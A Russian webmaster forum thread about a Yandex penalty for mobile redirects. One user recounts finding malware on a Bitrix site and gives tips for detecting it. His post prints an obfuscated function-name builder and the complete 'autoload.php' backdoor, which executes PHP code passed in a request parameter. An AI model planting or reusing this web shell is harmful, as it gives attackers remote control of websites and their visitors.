- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
На сайте ничего не менял. Рекламу тоже не трогал. Переписка со службой поддержки результата не дала. Просто нажал кнопку.
Доброго времени суток!
Вновь на сайт наложен данный фильтр - Обман пользователей мобильного интернета.
При первом обращении в ответ пришло шаблонное письмо. Попросил прислать конкретные страницы, где происходит перенаправление на платные услуги.
Ответ Платона:
Перенаправления происходили, например, с этой страницы вашего сайта: https://armymusic.ru/K/43-korenyugin-aleksandr/54-sanya-1/774-pod-sapogami-mnetsya-gryaz.html на следующие хосты:
Как это можно проверить? И как увидеть эти редиректы своими глазами?
у вас очень долгая подгрузка контента идет
я это воспринял как грабер с других сайтов (для родного сервера дюжа долгий процесс)
конечно я могу ошибаться! Но - в любом случае только вы можете знать что там в этой подгрузке происходит
НО если это грабер и есть большая вероятность что код редиректа то не у вас на сайте........
Как это можно проверить? И как увидеть эти редиректы своими глазами?
Сразу извиняюсь за много букв, но думаю это будет полезно многим в поисках....
Слушайте и держитесь! Возможно кому-то помогу в поиске проблемы и отлова этих редиректов. Сам борюсь уже с июня этого года. В начале так же ничего не понимал куда копать и где искать...
Так же писал в поддержку яндекса и так же отвечали. Забегая вперед нашел вредный код, удалил и ограничения снимали примерно недели через 2 после нажатия на кнопку "Исправил", но через какое-то время код вновь появлялся и санкции вновь накладывались от яндекса... уже в 3-й раз жду снятия санкций.......
Итак по порядку: реально своими глазами можно увидеть редирект (но не всегда срабатывает) только при использовании мобильного интернета (через WiFi не работает). Так же нужно полностью очистить всю историю (я для этого использовал встроенный браузер андройда).
Где нашел сам редирект: в битриксе в первой строке header.php, этот файл грузится на всех страницах сайта. На вашей системе ищите где может быть.... (причем на локальной копии (с которой работаю) все было норм - изменения произошли на сервере - это я так сразу исключил какой-то вирус у себя..... По времени изменения файла по логам уже было не отследить как и кто его изменил...
Далее через неделю строка появилась снова, и стал смотреть логи... И как вычислил по логам, где-то в глубине был закопан php скрипт, который (как я полагаю) запускался в ручную (точнее там даже форма в которую что-то вводится и которая что-то делает далее). PHP Код очень хитроумный и фильтрами его сложно отловить - все функции собираются из огромного словаря символов.. вот пример кода который уже обрабатывал форму:
if (isset($_POST['d42'])) $sddas = "*".$_POST['d42'].'*'."\r\n";
$f12='b'.$U.$T.$S.'64'.$J.'d'.$S.$R.'od'.$S;
$f23=$T.'t'.$M.$J.$M.$S.'p'.$A.$U.$R.$S;
$f37=$T.$S.'t'.$R.'ooki'.$S;
$f43='gzinf'.$A.$U.'t'.$S;
$f50=$R.$M.$S.$U.'t'.$S.$J.'fun'.$R.'tion';
$f60='mb'.$J.$T.'ub'.$T.'t'.$M;
$f78='mb'.$J.$T.'t'.$M.$A.$S.'n';
$f88='md5';
$f95=$T.'h'.$U.'1';
$f104='o'.$M.'d';
$f115=$R.'h'.$M;
далее идет огромный словарь символов и пара маленьких функций с циклами перебора этих словарей, а итоговая собранная функция запускалась просто: $k27(); Это по сути текстовая переменная с функцией... И в приведенном примере вы можете в одной переменной собрать "create_function"..
ну в общем я отключил все это дело, поставил контрольки, что бы мне пришло сообщение что пытаются запустить скрипт... ждать пришлось чуть менее недели... пытались запустить скрипт раз 15.. и по логам это тоже было видно.. проверил кода с редиректом не появилось ну думаю на этом все успокоится.. через часа 4 еще раз 10 пытались запустить и на этом все успокоилось... яндекс разбанил и жизнь вроде как наладилась.... но тут опять прилетел бан, опять этот редирект в хидере.. по логам нашел еще такой же файл, но в другом месте... И слушайте, думал вычислить когда он появился, но не тут-то было - фал был создан аж 2015 году - в аккурат когда и соседние фалы в этой папке.... Т.е. оп дате изменения искать не реально.
Все мои мысли как поиском вычислить всю эту заразу я так и не придумал... все функции в скриптах собираются из словарей и потом уже собираются... По ftp логам (за большой период времени) я тоже не смог найти, что бы что-то загружалось похожее, все мои загрузки только.... Поэтому вероятно фалы создавались прямо на сайте и дата изменялась (так исключил загрузку из админки битрикса и загрузку по ftp)...
В общем я нашел на сайте порядка 10 разных фалов подобного содержания. Искал исключительно сравнивая резервную копию сайта очень старой и текущей версии....
И так еще несколько наводящего, что можно искать:
1. несколько фалов (в разных местах) были с именем git.php
2. Так же встретились файлы: jquery.php, css.php, mbstring.php, json.php, plugins.php, components.php - вроде в начале на такие и не обратишь внимание, если не расширение.... Все файлы либо словари, либо что-то вроде строк "\152\x61\x76\141\137\163\x65\163\163\x69\x6f\x6e\137" и создание классов.....
3. Еще фалик с именем "autoload.php" с содержимым: <?php
$TEYFW = "\142\141\163\145" . 576 / 9 . "\137\x64\x65" . "\143\x6f\144\x65"; $mki6B = $TEYFW("\131\63\112\x6c\x59\x58\x52\154\130\62\x5a\61\142\x6d\116\60\x61\x57\x39\165"); if ($rwWwl = $mki6B('', "\162\x65\164\165\162\156\40" . @$_REQUEST["\x61\152\x61\170\137\152\161\165\x65\162\171\137\x31\60"] . "\73")()) { print "\x3c\160\x72\145\x3e"; print_r($rwWwl); }?>
?>
Я так понимаю с помощью него загружались нужные фалы.....
Короче резюмируя - поиском найти сложно, единственное искать по регулярке функции (точнее переменную со скобками) с именем похожим на "$f34()" - буква может быть любой и цифр может другое количество. но этим все не отловите - так я нашел только 2 фала.
Функцию PHP touch искать бесполезно - не нашел ни одного файла. По кускам словарей так же искать бесполезно....
Идеально если у вас есть старая резервная копия и по ней сравнивать с текущей и вычислять измененные файлы.
Сразу извиняюсь за много букв, но думаю это будет полезно многим в поисках....
Мог бы просто написать - "дыра на сайте" и всех делов.
Ну видимо у многих "дыра на сайте" и эти многие не подозревают об этом, раз это тема возникла, а я просто пытаюсь помочь людям в поиске, а не просто сидеть и давить на кнопку "Я все исправил"...
Ну видимо у многих "дыра на сайте" и эти многие не подозревают об этом,
1. Диагноз "Обман пользователей мобильного интернета" совершено не обязательно связан с дырой на сайте. Других причин гораздо больше (и тут них писали).
2. Непонятно зачем ты всё это тут расписывал. Избавление от дыр - сугубо личная процедура и для этого есть целый раздел на сёрче.